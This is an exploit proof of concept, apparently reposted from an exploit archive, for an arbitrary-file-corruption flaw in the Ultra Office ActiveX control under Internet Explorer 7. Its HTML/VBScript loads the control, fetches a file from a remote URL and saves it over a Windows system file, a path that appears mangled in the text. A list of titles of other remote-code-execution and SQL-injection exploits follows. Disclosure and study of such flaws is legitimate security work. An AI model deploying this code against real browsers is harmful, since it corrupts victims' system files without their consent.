-----------------------------------------------------------------------------
Ultra Office ActiveX Control Remote Arbitrary File Corruption
url: http://www.ultrashareware.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:00989888-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
dim remURL
remURL = "http://SomeSite.com/SomeFile.doc"
test.Open remURL, True
test.Save "C:WINDOWS_system.ini", True
End Sub
</script>
【Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit】相关文章:
★ LoveCMS 1.6.2 Final Remote Code Execution Exploit
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)
★ fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)
★ Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
★ minb 0.1.0 Remote Code Execution Exploit
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
★ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
★ Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit